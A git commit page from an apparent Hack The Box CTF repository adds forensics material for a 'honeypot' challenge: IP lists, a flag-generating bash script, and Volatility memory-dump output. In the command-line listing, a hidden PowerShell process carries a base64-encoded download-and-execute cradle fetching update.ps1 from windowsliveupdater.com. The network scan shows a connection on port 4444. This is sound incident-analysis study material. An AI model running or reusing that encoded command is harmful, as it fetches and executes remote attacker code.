aaron/htb-santa-ctf
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

add forensics

Browse Source
This commit is contained in:
aaron
2021-12-02 22:01:31 +01:00
parent f1db6a288e
commit b3014e4977
6 changed files with 346 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

72
forensics/honeypot/connected_ips Normal file
View File

@@ -0,0 +1,72 @@
0.0.0.0
0.0.0.0
10.0.2.15
93.184.220.29
10.0.2.15
172.67.177.22
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
10.0.2.15
0.0.0.0
0.0.0.0
10.0.2.15
0.0.0.0
10.0.2.15
212.205.126.106
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
10.0.2.15
10.0.2.15
147.182.172.189
10.0.2.15
212.205.126.106
10.0.2.15
212.205.126.106
0.0.0.0
0.0.0.0
127.0.0.1
0.0.0.0
0.0.0.0
10.0.2.15
212.205.126.106
10.0.2.15
204.79.197.203
10.0.2.15
95.100.210.141
10.0.2.15
212.205.126.106
10.0.2.15
212.205.126.106
10.0.2.15
172.67.177.22
10.0.2.15
95.100.210.141

21
forensics/honeypot/generate_flags.sh Executable file
View File

@@ -0,0 +1,21 @@
#!/bin/bash
list=(
10.0.2.15
127.0.0.1
65.55.44.109
147.182.172.189
172.67.177.22
204.79.197.203
212.205.126.106
93.184.220.29
95.100.210.141
)
for ip in ${list[@]}; do
echo Generating Flag from $ip:
echo "HTB{echo -n "https://windowsliveupdater.com/update.ps1_2700_$ip"|md5sum}"
echo "HTB{$(echo -n "https://windowsliveupdater.com/update.ps1_2700_$ip"|md5sum)}"
done

129
forensics/honeypot/test Normal file
View File

@@ -0,0 +1,129 @@
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
65.55.44.109
0.0.0.0
0.0.0.0
0.0.0.0
10.0.2.15
93.184.220.29
10.0.2.15
172.67.177.22
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
10.0.2.15
0.0.0.0
0.0.0.0
10.0.2.15
0.0.0.0
10.0.2.15
212.205.126.106
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
0.0.0.0
10.0.2.15
10.0.2.15
147.182.172.189
10.0.2.15
212.205.126.106
10.0.2.15
212.205.126.106
0.0.0.0
0.0.0.0
127.0.0.1
0.0.0.0
0.0.0.0
10.0.2.15
212.205.126.106
10.0.2.15
204.79.197.203
10.0.2.15
95.100.210.141
10.0.2.15
212.205.126.106
10.0.2.15
212.205.126.106
10.0.2.15
172.67.177.22
10.0.2.15
95.100.210.141

60
forensics/honeypot/win_cmdline Normal file
View File

@@ -0,0 +1,60 @@
Volatility 3 Framework 1.0.1
PID Process Args
4 System Required memory at 0x10 is not valid (process exited?)
236 smss.exe \SystemRoot\System32\smss.exe
308 csrss.exe %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
348 wininit.exe wininit.exe
360 csrss.exe %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
400 services.exe C:\Windows\system32\services.exe
408 lsass.exe C:\Windows\system32\lsass.exe
416 lsm.exe C:\Windows\system32\lsm.exe
496 winlogon.exe winlogon.exe
572 svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch
636 VBoxService.ex C:\Windows\System32\VBoxService.exe
692 svchost.exe C:\Windows\system32\svchost.exe -k RPCSS
744 svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
848 svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
888 svchost.exe C:\Windows\system32\svchost.exe -k netsvcs
1012 svchost.exe C:\Windows\system32\svchost.exe -k LocalService
1084 svchost.exe C:\Windows\system32\svchost.exe -k NetworkService
1208 spoolsv.exe C:\Windows\System32\spoolsv.exe
1252 svchost.exe C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
1376 vmicsvc.exe C:\Windows\system32\vmicsvc.exe -feature Heartbeat
1396 vmicsvc.exe C:\Windows\system32\vmicsvc.exe -feature KvpExchange
1432 vmicsvc.exe C:\Windows\system32\vmicsvc.exe -feature Shutdown
1440 taskhost.exe "taskhost.exe"
1504 vmicsvc.exe C:\Windows\system32\vmicsvc.exe -feature TimeSync
1532 dwm.exe "C:\Windows\system32\Dwm.exe"
1540 vmicsvc.exe C:\Windows\system32\vmicsvc.exe -feature VSS
1556 explorer.exe C:\Windows\Explorer.EXE
1620 svchost.exe C:\Windows\System32\svchost.exe -k utcsvc
1716 VBoxTray.exe "C:\Windows\System32\VBoxTray.exe"
1872 cygrunsrv.exe "C:\Program Files\OpenSSH\bin\cygrunsrv.exe"
1956 wlms.exe C:\Windows\system32\wlms\wlms.exe
1612 cygrunsrv.exe Required memory at 0x7ffd9010 is not valid (process exited?)
1684 conhost.exe \??\C:\Windows\system32\conhost.exe "-57088940168010838710243314093101560802089520680-1936804963-2081634044-598129742
1676 sshd.exe "C:\Program Files\OpenSSH\usr\sbin\sshd.exe"
1800 sppsvc.exe C:\Windows\system32\sppsvc.exe
2080 svchost.exe C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
2360 SearchIndexer. C:\Windows\system32\SearchIndexer.exe /Embedding
2440 SearchProtocol "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
2460 SearchFilterHo "C:\Windows\system32\SearchFilterHost.exe" 0 504 508 516 65536 512
2616 csrss.exe %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
2644 winlogon.exe winlogon.exe
2784 taskhost.exe "taskhost.exe"
2844 dwm.exe "C:\Windows\system32\Dwm.exe"
2856 explorer.exe C:\Windows\Explorer.EXE
3108 regsvr32.exe Required memory at 0x7ffd5010 is not valid (process exited?)
3504 VBoxTray.exe "C:\Windows\System32\VBoxTray.exe"
3112 WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe
3324 iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe"
3344 iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3324 CREDAT:14337
2700 powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /window hidden /e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAAZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA==
3732 conhost.exe \??\C:\Windows\system32\conhost.exe "288449379-1457209856-1923954052-101100547-172367320720102786213404402731845854479
4028 whoami.exe Required memory at 0x7ffdf010 is not valid (process exited?)
4036 HOSTNAME.EXE Required memory at 0x7ffd7010 is not valid (process exited?)
2924 DumpIt.exe "C:\Users\Santa\Desktop\DumpIt.exe"
2920 conhost.exe \??\C:\Windows\system32\conhost.exe "280284285205075330588133904-110126809119471720131011406317-845024101-1158882802
168 dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

62
forensics/honeypot/win_netscan Normal file
View File

@@ -0,0 +1,62 @@
Volatility 3 Framework 1.0.1
Offset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner Created
0x23d04218 TCPv4 0.0.0.0 49155 0.0.0.0 0 LISTENING 400 services.exe N/A
0x23d04218 TCPv6 :: 49155 :: 0 LISTENING 400 services.exe N/A
0x2554b460 TCPv4 10.0.2.15 49226 93.184.220.29 80 ESTABLISHED - - -
0x261e9d30 TCPv4 10.0.2.15 49228 172.67.177.22 443 ESTABLISHED - - -
0x3e22f008 UDPv4 0.0.0.0 0 * 0 2080 svchost.exe 2021-11-25 19:12:23.000000
0x3e22f008 UDPv6 :: 0 * 0 2080 svchost.exe 2021-11-25 19:12:23.000000
0x3e238300 TCPv4 0.0.0.0 445 0.0.0.0 0 LISTENING 4 System N/A
0x3e238300 TCPv6 :: 445 :: 0 LISTENING 4 System N/A
0x3e24c588 UDPv4 0.0.0.0 0 * 0 2080 svchost.exe 2021-11-25 19:12:23.000000
0x3e281368 UDPv4 10.0.2.15 138 * 0 4 System 2021-11-25 19:12:23.000000
0x3e2a29b8 UDPv4 0.0.0.0 0 * 0 1084 svchost.exe 2021-11-25 19:12:23.000000
0x3e2a29b8 UDPv6 :: 0 * 0 1084 svchost.exe 2021-11-25 19:12:23.000000
0x3e2a6448 UDPv4 0.0.0.0 5355 * 0 1084 svchost.exe 2021-11-25 19:12:26.000000
0x3e2b5b88 TCPv4 10.0.2.15 139 0.0.0.0 0 LISTENING 4 System N/A
0x3e2e9cc0 TCPv4 10.0.2.15 49221 212.205.126.106 443 ESTABLISHED - - -
0x3e354618 UDPv6 fe80::256b:4013:4140:453f 546 * 0 744 svchost.exe 2021-11-25 19:12:31.000000
0x3e3b0c70 UDPv4 0.0.0.0 0 * 0 2700 powershell.exe 2021-11-25 19:13:51.000000
0x3e5e4f50 UDPv4 0.0.0.0 5355 * 0 1084 svchost.exe 2021-11-25 19:12:26.000000
0x3e5e4f50 UDPv6 :: 5355 * 0 1084 svchost.exe 2021-11-25 19:12:26.000000
0x3e5f77a0 TCPv4 0.0.0.0 22 0.0.0.0 0 LISTENING 1676 sshd.exe N/A
0x3e619578 TCPv4 0.0.0.0 49152 0.0.0.0 0 LISTENING 348 wininit.exe N/A
0x3e619578 TCPv6 :: 49152 :: 0 LISTENING 348 wininit.exe N/A
0x3e619cc0 TCPv4 0.0.0.0 49152 0.0.0.0 0 LISTENING 348 wininit.exe N/A
0x3e630008 UDPv4 0.0.0.0 0 * 0 2700 powershell.exe 2021-11-25 19:13:51.000000
0x3e630008 UDPv6 :: 0 * 0 2700 powershell.exe 2021-11-25 19:13:51.000000
0x3e630a20 TCPv4 0.0.0.0 49156 0.0.0.0 0 LISTENING 408 lsass.exe N/A
0x3e630a20 TCPv6 :: 49156 :: 0 LISTENING 408 lsass.exe N/A
0x3e648508 TCPv4 0.0.0.0 49153 0.0.0.0 0 LISTENING 744 svchost.exe N/A
0x3e648508 TCPv6 :: 49153 :: 0 LISTENING 744 svchost.exe N/A
0x3e6b92c0 TCPv4 0.0.0.0 135 0.0.0.0 0 LISTENING 692 svchost.exe N/A
0x3e6b92c0 TCPv6 :: 135 :: 0 LISTENING 692 svchost.exe N/A
0x3e6b9910 TCPv4 0.0.0.0 135 0.0.0.0 0 LISTENING 692 svchost.exe N/A
0x3e6f0bd8 TCPv4 0.0.0.0 49153 0.0.0.0 0 LISTENING 744 svchost.exe N/A
0x3e75f8e0 TCPv4 0.0.0.0 49154 0.0.0.0 0 LISTENING 888 svchost.exe N/A
0x3e762a40 TCPv4 0.0.0.0 49155 0.0.0.0 0 LISTENING 400 services.exe N/A
0x3e7686e8 TCPv4 0.0.0.0 49154 0.0.0.0 0 LISTENING 888 svchost.exe N/A
0x3e7686e8 TCPv6 :: 49154 :: 0 LISTENING 888 svchost.exe N/A
0x3e8611f0 TCPv4 0.0.0.0 22 0.0.0.0 0 LISTENING 1676 sshd.exe N/A
0x3e8611f0 TCPv6 :: 22 :: 0 LISTENING 1676 sshd.exe N/A
0x3e9be828 TCPv4 0.0.0.0 49156 0.0.0.0 0 LISTENING 408 lsass.exe N/A
0x3ed036c8 UDPv4 10.0.2.15 137 * 0 4 System 2021-11-25 19:12:23.000000
0x3ee98d80 TCPv4 10.0.2.15 49229 147.182.172.189 4444 ESTABLISHED - - -
0x3f1b0df8 TCPv4 10.0.2.15 49216 212.205.126.106 443 ESTABLISHED - - -
0x3f225df8 TCPv4 10.0.2.15 49222 212.205.126.106 443 ESTABLISHED - - -
0x3f2cff50 UDPv4 0.0.0.0 0 * 0 - - 2021-11-25 19:13:04.000000
0x3f2cff50 UDPv6 :: 0 * 0 - - 2021-11-25 19:13:04.000000
0x3f4d7378 UDPv4 0.0.0.0 0 * 0 2700 powershell.exe 2021-11-25 19:13:51.000000
0x3f4dad28 UDPv4 127.0.0.1 58426 * 0 3344 iexplore.exe 2021-11-25 19:13:31.000000
0x3f520ab8 UDPv4 0.0.0.0 0 * 0 2700 powershell.exe 2021-11-25 19:13:51.000000
0x3f520ab8 UDPv6 :: 0 * 0 2700 powershell.exe 2021-11-25 19:13:51.000000
0x3f546de8 UDPv4 0.0.0.0 0 * 0 636 VBoxService.ex 2021-11-25 19:14:14.000000
0x3f547008 TCPv4 10.0.2.15 49220 212.205.126.106 443 ESTABLISHED - - -
0x3f561438 TCPv4 10.0.2.15 49215 204.79.197.203 443 ESTABLISHED - - -
0x3f57c438 TCPv4 10.0.2.15 49218 95.100.210.141 443 ESTABLISHED - - -
0x3f58b4c8 TCPv4 10.0.2.15 49217 212.205.126.106 443 ESTABLISHED - - -
0x3f58c748 TCPv4 10.0.2.15 49223 212.205.126.106 443 ESTABLISHED - - -
0x3f58e9d8 TCPv4 10.0.2.15 49225 172.67.177.22 443 ESTABLISHED - - -
0x3f5c6df8 TCPv4 10.0.2.15 49219 95.100.210.141 443 ESTABLISHED - - -